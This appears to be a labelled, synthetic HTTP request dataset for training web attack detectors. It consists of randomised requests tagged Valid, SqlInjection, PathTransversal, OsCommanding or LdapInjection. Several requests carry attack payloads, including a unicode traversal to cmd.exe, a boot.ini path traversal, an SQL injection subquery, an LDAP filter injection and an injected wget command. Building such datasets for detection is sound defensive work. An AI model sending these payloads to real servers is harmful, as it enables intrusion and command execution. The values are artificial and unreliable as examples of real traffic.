PUT /yaHP8F4Hq-B/ti19jFw909-q5c32xCL.js? HTTP/1.0
Content-Length: 245
Content-Language: tL3een,rqmosf,uls
Content-Encoding: identity
Content-Location: /m8oDogt/heeoode/isliLng/ilieieme.cgi
Content-MD5: aTB1ZW1UcmllMG95bjZOZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 20:22:48 GMT
Last-Modified: Thu, 06 May 04 03:23:47 CET
Host: 17.247.7.253:80
Connection: keep-alive
Accept: audio/*, application/x-tar, audio/*
Accept-Charset: windows-1250, utf-8, windows-1253, cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 87.239.190.162
Cookie: grYXftpyFdeleteJ_=39736
Cookie2: $Version="28"
Date: Sun, 30 Dec 07 04:34:06 UTC
ETag: "v0-1@Rv2TACZbOUJTaV"
Expect: hnujl5=enoyt;3ssa
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 01 Jun 05 12:23:03 CET
If-Unmodified-Since: Sun, 06 Apr 08 22:00:35 GMT
If-Match: "Mk@SwT8ep2uDV.Lk2RR3"
If-None-Match: "vulLrsJtoIcR7QW"
If-Range: *
Max-Forwards: 3344
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Digest realm
Range: 171-10,013-0,-6
Referer: http://caR7i.ch/uhfodp/4rafHd/rata/avel/Hemspt.dll
TE: gzip;q=0.5,deflate
Trailer: Pragma
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 9.3; ef-tm; rv:1.5.8) Gecko/90352026
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/4.4 www.amPgema6.jpg, 5.0 www.1serloi.htm
Transfer-Encoding: gzip
Upgrade: oyhgd/4.8, nny/4.3, q6hld/1.0, iLos/5.2
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~

L@lGQldSQPT8=";  /usr/bin/wget     www.tont.com/ne;&o4eytntlsE1ae=rfrom&eh9sHai=en&XBSgssamYZJV1K=2&umUndocumentcK= f]z0dRe&igieca=3520985456&psmdona=tqih&1iociasg=fiSLiieiUUmuEf&siEx1p0teo=2021742965&vtopeoekleite=aM3olxepi sw0c

End - Id: 43018
Start - Id: 34977
class: Valid
POST /XNyssai9a7ek9Rydgo/6haDtmpfae8/rwQx35X8WshIBgG_51/prhP95hR_6/s86HUo2224P@.y9Ni0/gotaaRaeza/hks/ldmort3omo30Er1ma/8GH8d.php? HTTP/1.1
Content-Length: 209
Content-Language: tupggd
Content-Encoding: compress
Content-Location: /gybtn.png
Content-MD5: OGRuejhydHd1cWVzZGFPNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Oct 06 15:04:11 UTC
Last-Modified: Sun, 06 Mar 05 04:37:13 GMT
Host: 116.162.169.190
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: cp-936
Accept-Encoding: deflate;q=0.9, deflate;q=0.7
Accept-Language: *;q=0.4
Cache-Control: min-fresh=5
Client-ip: 114.161.242.155
Cookie: ehH1tn1atrisnsx=qs;IdI0stdinC=96315328;RAabicpoly9wn=tWs;ersm77okse=or:shutdownnc gnisr ;uxl
Cookie2: $Version="67"
Date: Mon, 28 Jun 04 03:39:06 GMT
ETag: "gvYwM3C8KJ7X8DLZlbcS"
Expect: hxsoa3en=shlmntit
From: Jfon@lR0e.de
If-Modified-Since: Mon, 23 Feb 04 18:30:32 UTC
If-Unmodified-Since: Sun, 24 Apr 05 12:53:38 CET
If-Match: "CvAn6Nk7IV0icPf"
If-None-Match: *
If-Range: Sat, 26 Sep 09 15:53:56 CET
Max-Forwards: 371
MIME-Version: 5.8
Pragma: ghE=i31Ks
Proxy-Authorization: Digest opaque="beh0Mbt"
Authorization: ttnyLt tOiehth5=9ePCr
Range: 364064-7831,-653,14-
Referer: /rncHl/iehy/hseh/Mk30.mdb
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.8 (compatible; risry; Win 9x; iqseiieho; teasffr; hohe)
UA-CPU: StrongARM
UA-Disp: 3992,5173,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1234x075
Via: 0.3 21.212.103.143
Transfer-Encoding: deflate
Upgrade: ku3hm/3.0, alouf/9.2
Warning: 585 242.163.219.88:39711 "liupeie" "Sat, 02 Feb 08 03:16:08 GMT"
X-Forwarded-For: 90.170.127.145
X-Serial-Number: 755245432377424
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

e29ebAteqooie=nwlipaSnfsic&IynatitlStAc=6r&au=2&hy=gtRarzBk&xoiterta8i=ajri8i6creirr1S&c7yi6agot=8vyaqth&ilta=ikt&HKUm=io&afbUi0xhcrem=hntqhr&lreemw=55924136&r9pbxws=Mh&AIddtbmsa=gnYRgUe&bsamq5xterm@u=s7adminu

End - Id: 34977
Start - Id: 7530
class: Valid
POST /y-yBxiK@Zf30ZT.jGOi/eAKvq@7VJDOV/ihetEgcosshl1i2a/tzzllawJ3v-k.Mu3/nm6OG7rnELMh/iDinJVe_FLM75Kr-o0/gbiee3on9rn.jsp? HTTP/1.1
Content-Length: 183
Content-Language: ut,jwLrju
Content-Encoding: compress
Content-Location: http://www.glGfeae.de/rlmb/tepit/aeoo6s/nrareeta.php
Content-MD5: aXU5cmhhdHN5bHJoZTJ3dA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Nov 04 15:27:03 UTC
Last-Modified: Sun, 20 Feb 05 01:39:14 UTC
Host: 51.113.235.157
Connection: enta
Accept: */*
Accept-Charset: shift_jis;q=0.7, ks_c_5601-1987
Accept-Encoding: deflate;q=0.8, deflate;q=0.0, deflate;q=0.6, gzip;q=0.1, compress;q=0.1
Accept-Language: *
Cache-Control: min-fresh=58178
Client-ip: 232.174.167.207
Cookie: Ewerseitte7=ttnCE
Cookie2: $Version="208"
Date: Fri, 30 Sep 05 15:47:21 UTC
ETag: "oLT_6AiGLe.@Ro3KGA"
Expect: Dhheatq=b6tben9w;isghre=dtTzbH4
From: eiansue@4pzkiAn.ch
If-Modified-Since: Mon, 10 Jul 06 10:35:20 GMT
If-Unmodified-Since: Wed, 27 May 09 07:33:02 UTC
If-Match: *
If-None-Match: "z69zKaNkZLZYFGrT"
If-Range: Fri, 10 Dec 04 19:38:18 GMT
Max-Forwards: 049
MIME-Version: 7.9
Pragma: E='enihy'
Proxy-Authorization: NTLM N3RhYWxzYUFvRXVlYW9Zc0FveWVlMGVmYXJnbWRlZHRzeXhybnV0cw==
Authorization: Digest response="9CeC54Fc430B88ebd12B3fDd319A6EBa"
Range: 31105-
Referer: http://4omoe.biz/lrs6xih6/pihCem/pTbv.asmx
TE: chunked,trailers
Trailer: Via
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 0.9; qe-io; rv:7.6.7) Gecko/75550203
UA-CPU: x86
UA-Disp: 8435,1661,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 568x0909
Via: 9.6 156.35.228.89, 4.1 www.rnLayue.js:878
Transfer-Encoding: deflate
Upgrade: snu/9.1, l0m/9.5, rlnstR/7.1
Warning: 753 44.227.245.134:8 "ufs6htn0rl" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 38021962558581
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rbncnat4fo=eugzertx3nar&TzzJ=f1bin&slaatle4gchbGa9=omii&lLSXopena5c=7668365631&martkbgeib=iJf4uaf&taeEMc=218&npNorOs5ecoTfi=$cat&nSssi=ee8mebarobiiae&t9dpkdtp3=326803&intdatra=52565

End - Id: 7530
Start - Id: 41616
class: SqlInjection
GET /iipXycF3XstNsE_06xm7/tbe1nd6cmnnlagiE2/tVMvd0/mxsuu3ehht/4ucbefEfem3u/unn/lyUJ4BzBxFTck6xHC/moRry/rDQPRIyXsh7OKOXDTD-/htts7snuatsacR/ehEXqtRpeO4@Ql4.php3?cfheo=1604&sues=8855&zhgotRurea=tfJ&oowINC56=aD%3Fbxdivs4mq%5Co&ssystem61rfIhXF=s&fptfr3k=ne+execlmu%3Cxem+vHh%3EeE&8e=oFlnesdniowl7jf&eozat8id=1051&0pnsrpxhbi=d&8egt1pa=4651333&.J0tmpIZecho1=nWNwCfOG.cuj&jyeyC=and++0%3C%3E%28select++count%28*%29+++++from++++nhG++where++++Tagrato%3C%3E%29&euh0yeQvhs6t=77094&ddho4nj=M47h4inki HTTP/1.0
Host: 184.9.25.166
Connection: close
Accept: image/png
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.2
Accept-Language: e-6A7t, tsadCl-tt
Cache-Control: no-transform
Client-ip: 224.247.255.87
Cookie: esui0lko9ta=nhtitimco/e2i;l@cUtelnet=aaNjSJDKNrs;YQZI=f]usr;srgwaar=imenetterstrt8ua;ifn=s3teisiaaaAaOa9e;iiuiuvtv2urr=1790
Cookie2: $Version="003"
Date: Mon, 09 Jan 06 11:08:28 GMT
ETag: "5AYEIKIO38UMnPD"
Expect: 100-continue
From: tcssd@oays6you.com
If-Modified-Since: Fri, 12 Oct 07 03:49:35 UTC
If-Unmodified-Since: Sun, 05 Jun 05 01:39:20 GMT
If-Match: "h-PoDt8tW8Wn8wuURKH_"
If-None-Match: *
If-Range: Tue, 25 Apr 06 05:14:02 GMT
Max-Forwards: 717
MIME-Version: 3.1
Pragma: nqsm=n2wk
Proxy-Authorization: NTLM aGN0Ym1ld2FsamtvcnRpYXNxRWNjc255b2luYU9pRXJl
Authorization: gacor pelAotem=lk8lt
Range: -27,878-
Referer: http://eehh.org/sdbrrmoo/gRagOshp/sjehb.pl
TE: trailers
Trailer: Host
User-Agent: luj14TC@Qy http://www.nco8te.uk
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: HTTP/7.8 www.eiuCro.css, HTTP/8.5 www.2iertm.jpeg, 6.4 158.50.218.211
Transfer-Encoding: compress
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 218 www.wr8guiO.js "zuoqfnirh7dgr3ealetn" 
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41616
Start - Id: 45511
class: PathTransversal
GET /ttlribermIujwmoOen/e0/3n/aaenwseesnAwehnhson/iFxmUbHa1R1./9oNbg9RuGaN/owCQKvtbY88R19ZJD/aa4orFmOJTrt6oldH2.tiff?ouwgetonrs=+%7C&wtS2=s%3A%5Cwinnt%5Cboot.ini&oPzp1ahi=16018609&oounM=smuyw&Cfei=opEoniEetsr HTTP/1.1
Host: 86.38.138.113
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1255, iso-8859-5;q=0.1, windows-874;q=0.3
Accept-Encoding: 
Accept-Language: lwne-eyAd;q=0.1, 8eOpoea-t;q=0.6, Ael-nEiosl;q=0.7, win-TeuIeubt, ogwuncrt-hiSidWiY;q=0.8
Cache-Control: no-cache
Client-ip: 34.130.199.77
Cookie: aueloRroa0eiGg=5458;naamgso2e=0281172;heoosPly=5966;ootoToe=oyba2mocha5nnAu;mnoxto9ahw6=gntdaott
Cookie2: $Version="77"
Date: Fri, 23 Feb 07 22:11:44 CET
ETag: "F6K.JXObdJoLwBQ2Ubso"
Expect: 100-continue
From: deeIete@oniiixeM.de
If-Modified-Since: Sun, 15 May 05 10:06:11 GMT
If-Unmodified-Since: Fri, 28 May 04 23:06:11 CET
If-Match: "snS-qjYQJR-3WRd"
If-None-Match: *
If-Range: Sat, 27 Aug 05 14:38:24 CET
Max-Forwards: 1120
MIME-Version: 8.4
Pragma: ltss='w4Phe'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: NTLM UG1uZGE1c2tlcVRlbXNSbmhPaWVtb2lFc21lbWVpb2FLdGFkdHR0YW9w
Range: 354-,63882-
Referer: http://n6zvtE.cz/ssah/hdal/Eoigj/ue0RhtS.cgi
TE: deflate
Trailer: Accept
User-Agent: drghlytEvuamN
UA-CPU: Sparc
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2096x915
Via: 4.5 www.irtI.tiff, HTTP/3.5 www.aaeh.tiff, aasipd/2.5 91.117.89.130:501
Transfer-Encoding: identity
Upgrade: paa/8.6, yprO/1.1
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45511
Start - Id: 22402
class: Valid
GET /a2bCuu6/2ioetxdtod4/Bwceeza5atsr/sgY1Q/g7gola/ejy0Hc/rl/CVHs/T9WkY/scriptCS4kF/t@SG.nsf?3wp-_8-UEm=sIuR&sFgta0h=Smhst9n&70gu6fwpo@2O=aIsga&7oaori3dhyfats=85324540&_bqbrz=%7Cpcscriptt%3A%7Enph-osystemscriptheuTs HTTP/1.1
Host: 245.169.65.65
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: miRot2hT-hsawiazt, eEi2-e;q=0.2, ihisms-tNHlni;q=0.4, eu-oiNBh;q=0.9
Cache-Control: only-if-cached
Client-ip: 195.143.59.185
Cookie: nnuidou15ste=sw;l5=e 14and@xo~e;patett=e4WidImpSW
Cookie2: $Version="025"
Date: Sun, 09 Oct 05 23:13:15 UTC
ETag: "YYFg_yu6KSP23m7mP"
Expect: 100-continue
From: 1eNTR8ie@q3cs.biz
If-Modified-Since: Sun, 23 Sep 07 20:24:51 UTC
If-Unmodified-Since: Wed, 02 May 07 24:03:52 CET
If-Match: *
If-None-Match: "SlYxF6Yfz2yoVDw7"
If-Range: *
Max-Forwards: 043
MIME-Version: 0.8
Pragma: hs='tte'
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: Digest nonce
Range: 272882-6
Referer: /osdsoee6.rar
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 9.2; a5-ws; rv:2.4.2) Gecko/37347191
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: iasaue/5.7 www.rnee.jpeg, FTP/6.4 www.Rwsa0sl.jpg
Transfer-Encoding: identity
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 245 169.86.241.14 "nhn9hhnhuaifml" "Sat, 17 Oct 09 10:05:26 CET"
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22402
Start - Id: 9016
class: Valid
GET /tib/Rzilcwri/yoat6i3aosk9emyq7u/2TFKdE1nEg1l9Mp0Wn2.dll?4xbbteoos9g=%7CE1o&aLxnbtkUs1n=ibccL&mloedvcEtly3f=55&tmgaI8ienB=mMj.&Rat5i5tr2oeiae=mrtv HTTP/1.1
Host: 164.186.4.215:3
Connection: XmQtlh2i
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, deflate;q=0.5
Accept-Language: *;q=0.6
Cache-Control: min-fresh=5
Client-ip: 28.236.104.175
Cookie: 3gslYitioe=41395
Cookie2: $Version="71"
Date: Tue, 15 Sep 09 22:38:53 UTC
ETag: "BU4387R@VTCZc_r3N"
Expect: rsna=taeheo4;iaiNrrni
From: moihss@1tlab.fr
If-Modified-Since: Sat, 30 Dec 06 04:00:30 CET
If-Unmodified-Since: Fri, 22 Feb 08 13:30:39 CET
If-Match: "AZjt1iYqN.ZgPAJNwHg"
If-None-Match: "PAYcFawMEcPw-qEP"
If-Range: *
Max-Forwards: 065
MIME-Version: 0.6
Pragma: aepsiD9e=lmsit
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: Digest opaque="notrsDib"
Range: -751,66639-06
Referer: http://iR7e2ye0.de/lftI4s/setjr9/aNoete.doc
TE: trailers,deflate,trailers
Trailer: From
User-Agent: eifrfd3cr/4.9.1.8.1
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7350x9086
Via: 3.0 7.139.119.50
Transfer-Encoding: teOr
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 145 191.84.114.78 "casehmDc" 
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9016
Start - Id: 36459
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.h5nt5dl.de
Connection: utgIt
Accept: application/zip
Accept-Charset: koi8-r;q=0.0, x-mac-cyrillic, iso-8859-1
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: min-fresh=58418
Client-ip: 9.139.53.150
Cookie: teih7pNtwkvq=dJqaX_Kh;rtmrIDb1agittx=3264664;qn=rRW;dnad=n1eTe;oRLEsl9ewluren=1978958
Cookie2: $Version="37"
Date: Fri, 14 Jul 06 12:08:07 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: amnm6
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Mon, 08 Mar 10 04:09:38 GMT
If-Match: *
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: "C2iD83XH4OAhphnS@_PV"
Max-Forwards: 99
MIME-Version: 8.0
Pragma: i5xaf='sdnu'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM ZTJzdHl5QWVvbXM1c3UxZTRhZXJwbzVkMGMwZXh1ZXJhbGU=
Range: 57-,410056-,436232-1281
Referer: http://iesc6tga.org/4R5e5r7a/uhEm.cgi
TE: trailers,deflate;q=0.3
Trailer: Referer
User-Agent: Mozilla/7.1 (Machintosh; U; Mac OS X 3.2; Uo-fd; rv:0.5.2) Gecko/76475847
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 428x8640
Via: 6.4 252.205.186.162
Transfer-Encoding: deflate
Upgrade: fet/9.1, iro/2.9
Warning: 940 176.201.209.211 "dndrrAtk" "Mon, 05 Jan 04 22:49:43 CET"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36459
Start - Id: 9594
class: Valid
GET /eAC2fTMfBkwA-r/7hoeen9YmG/tiheao.asp?8pPJKe.D=itmeeoea%40a&ilhunsl=n6&maim=75748&oeEso0i6=28903&hwgetLb=chttpsj&gtn=9371671&iwbbe4esntanwi=819 HTTP/1.0
Host: 172.255.188.219
Connection: 3isroe0d
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.9
Accept-Language: *
Cache-Control: tUm=r
Client-ip: 123.189.18.103
Cookie: Dl7rayiscolt=2eq]woxsmowhereSoH;tW=pgaa9veccou;xhmerrnaIda=sltz;kdWemWvbscript=oTMlVfH;sTeeCseAnv=7t0i9Ooahmorr
Cookie2: $Version="4"
Date: Tue, 07 Nov 06 04:32:36 UTC
ETag: W/"UBxHWof-HvmgpxD"
Expect: t0pna=erg0c
From: eSsaDtn@crno.be
If-Modified-Since: Fri, 18 May 07 18:03:46 CET
If-Unmodified-Since: Thu, 24 Apr 08 04:26:21 GMT
If-Match: *
If-None-Match: *
If-Range: "rZ4ojGoS11PyNLRLJ4x"
Max-Forwards: 207
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/3kteNf/fyt4nept.nsf
Authorization: e2w3 e8battw1=jte6ehf
Range: -7342
Referer: /onrbc/iTktw.php
TE: trailers,chunked,trailers
Trailer: Host
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 5.4; Ii-4e; rv:9.4.1) Gecko/45164171
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7883x011
Via: ihs/2.8 221.88.131.1:7, 7.9 www.eTaao.png, 2.4 www.eeptfaan.tiff
Transfer-Encoding: identity
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 199.4.112.189
X-Serial-Number: 1202547378477429523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9594
Start - Id: 38753
class: LdapInjection
GET /lIkBxKK6mQk4shc/thttprLhRj/hmr7d2oeuylj/aoyr8qs8e/xIVsNETNl5U/lhfileox/Nw0ToY7jlRSaccess_log9/ktcat_rztbL@.mdb?rceix=d&sHhsTtlghil=251&oaeIxen7ieu=tnrnstl1&5az5raeuosya=pNsi%29%28++++%7C%28tsfd%3D*%29&isW9SuhIsrNS=2ubPHBRjL4J&qhesiTLtm=rhuwsss&r2ebbwtotei4=aQTf_u0X0gUL HTTP/1.0
Host: www.prs6.gov
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.2, iso-8859-9;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: ys-6otr;q=0.4, rH2-f;q=0.0, ktanhWnt-ubvAep;q=0.5, insO5a-t;q=0.4, oe3c-cuoi;q=0.8
Cache-Control: no-store
Client-ip: 111.176.120.104
Cookie: Etrd=nz;reah0TsoTdl=ded;eOoanxseSeHj=ftstpasswd;Oraofeoh1Xsofob=mlatt o0execrreetl;ecn3AhsgF1sG=i2ra
Cookie2: $Version="8"
Date: Sat, 30 Jul 05 11:46:47 UTC
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2639
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Digest uri=/haeus.wav
Range: -6168,6-
Referer: http://www.yerort8o.net/sssnL/SLddrpee.sh
TE: gzip;q=0.8,trailers
Trailer: Date
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 6.3; Ei-hb; rv:2.1.7) Gecko/52229180
UA-CPU: MIPS
UA-Disp: 8384,101,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: HTTP/0.8 www.atuunIy.htm, 7.9 9.144.248.252, HTTP/5.6 www.twroa.css
Transfer-Encoding: notx
Upgrade: eihbsv/2.5, adsr/9.3, od6ng/8.7
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38753
Start - Id: 19326
class: Valid
GET /o_jTCJaVds6MY/Sd-7t0%ui8UinputDjJor/emn4OtKAVhXPCM/VKW-E_positionNGa/8eiTs5e5t.asp? HTTP/1.1
Host: 87.5.102.13
Connection: boduk
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 33.79.28.5
Cookie: oshe=rgUxJCJzD598;rpaaeisonToe=68964
Cookie2: $Version="499"
Date: Thu, 04 Oct 07 03:15:25 CET
ETag: W/"1uNXHiP1_UmTLA.1dL"
Expect: t1he=ueEe;Eseeceh=eoruc
From: Zda4pbA@utsheoe.biz
If-Modified-Since: Sun, 24 Jul 05 01:58:38 GMT
If-Unmodified-Since: Thu, 30 Oct 08 13:38:02 GMT
If-Match: "jwsLC25ScbZpc2flaS"
If-None-Match: "-_6Ns1M9qVHZWwA4zd"
If-Range: Sun, 13 Apr 08 21:03:57 UTC
Max-Forwards: 37
MIME-Version: 4.5
Pragma: ntO49h=aosf
Proxy-Authorization: NTLM b25pYXJlaXRpbGMwbmNkdnRzb2Fjc2RvNml0bWlSZXNobGxsaWVkSHBuaQ==
Authorization: eowNin hunn5oo9=e2eLant
Range: 0-6218,62-,-50681
Referer: http://niid.org/oRwf/issstel/otR1heT.cgi
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.4 (X11; U; Open BSD i586 9.4; ba-rr; rv:0.9.5) Gecko/49493822
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5443x8172
Via: 2.5 www.cmetrene.html, 7.3 www.ccst.html, 8.0 www.eWrNlat.htm
Transfer-Encoding: compress
Upgrade: sahcq/0.1
Warning: 333 161.38.217.77 "ytiqpMa5" 
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19326
Start - Id: 32497
class: Valid
GET /sra5emtpusweioat2696/aBFotz-e/tnpi.gif?Eitnrrjts3=jhneshIgx5ptTs&iho=m7lxmgttahuooetwar&woiiUApyot5a=tLzZXB0&da=oBEDfl_h%40&koL2ipezwgssrA=347845056&xenIe=izCr&uLMaeohttaafia=l+uno3pzM&tssgeihc7trtn7=7673463 HTTP/1.1
Host: 160.217.86.152:80
Connection: anetam
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: c-di, e3tae8bm-yhr;q=0.0, sepmrhU-om2es, slhaNp3a-emNEa;q=0.0
Cache-Control: max-stale
Client-ip: 53.255.204.193
Cookie: ditFortknekl=Ibdpseehroeei;pTtvhwva9e=9522;ldate=gdeleteeql
Cookie2: $Version="6"
Date: Sun, 28 Oct 07 12:05:25 CET
ETag: "1eiv9ZzQSwpJKjs88uV"
Expect: 100-continue
From: l4x9ira@aGdrat.it
If-Modified-Since: Tue, 11 Aug 09 20:42:52 UTC
If-Unmodified-Since: Fri, 09 Jul 04 02:59:03 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 01 May 09 06:57:38 CET
Max-Forwards: 662
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="ktfsoc"
Authorization: Nemrh4 m7q4r5=tmaoo
Range: 61872-,1-23590
Referer: http://egoni.uk/4yha/jiSUudam.conf
TE: gzip;q=0.0,trailers,trailers
Trailer: Via
User-Agent: Mozilla/0.1 (X11; U; Solaris 1.3; d7-ic; rv:1.2.4) Gecko/07715494
UA-CPU: x86
UA-Disp: 050,1094,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5986x8829
Via: rn43e/9.6 www.esticam.css, HTTP/6.4 www.tMINa.js
Transfer-Encoding: gzip
Upgrade: ottr8/8.0, iwmS/1.0, oey/2.0, rief/2.4
Warning: 101 4.89.40.8:21062 "akHa4tdddrpeehjib" 
X-Forwarded-For: 197.95.125.178
X-Serial-Number: 31593732
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32497
Start - Id: 5695
class: Valid
POST /snuuep/tsi/eqaeqg7ynsOlj/eB_tJga8/vYE..asp? HTTP/1.0
Content-Length: 91
Content-Language: ABeti5eA
Content-Encoding: deflate
Content-Location: /Euiuh2ba/tyautcin/5lakqt/R9nl2tVl/3ctl.sh
Content-MD5: YnJsbjllbGgxYnNvZWxXbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Jan 04 23:25:39 CET
Last-Modified: Tue, 25 Apr 06 23:46:01 GMT
Host: 150.224.150.252:80
Connection: close
Accept: video/mpeg, video/*;q=0.6
Accept-Charset: koi8;q=0.0, x-mac-chinesesimp;q=0.4, big5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 55.210.122.254
Cookie: eeryat=476;ragfet4itRa7eoa=6;eesnqT=dRD;7lccohU8o=ezej0aBIS
Cookie2: $Version="33"
Date: Tue, 01 Nov 05 20:15:59 GMT
ETag: "VVGNW8zSXxQI4.C1N"
Expect: 100-continue
From: jdYeaesr@naae.de
If-Modified-Since: Fri, 11 Nov 05 17:38:36 GMT
If-Unmodified-Since: Thu, 21 Oct 04 09:54:50 CET
If-Match: ".6sev6Z-V5i.3rnX"
If-None-Match: "qUUGMtaui77Lw9lgY"
If-Range: "YSF6eNoNEwwWA7LOqh"
Max-Forwards: 74
MIME-Version: 1.1
Pragma: rttnhsdt=2ar8
Proxy-Authorization: 5emer ephane=n6oq
Authorization: lgiW tewesthi=eielal
Range: 741-
Referer: /eDoroc.bin
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 0.5; v8-uO; rv:9.5.6) Gecko/62795113
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 327x1132
Via: 8.9 www.owiye.htm:11, 5.7 6.148.157.230, HTTP/7.8 www.swihqo.tiff
Transfer-Encoding: deflate
Upgrade: nxew/9.7, neam/4.9, tRYe/6.4, 8mide/6.4, aola/1.1
Warning: 214 www.32y8re.png "fuadutamienNmaN2eaon" 
X-Forwarded-For: 161.194.150.26
X-Serial-Number: 7835393170
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

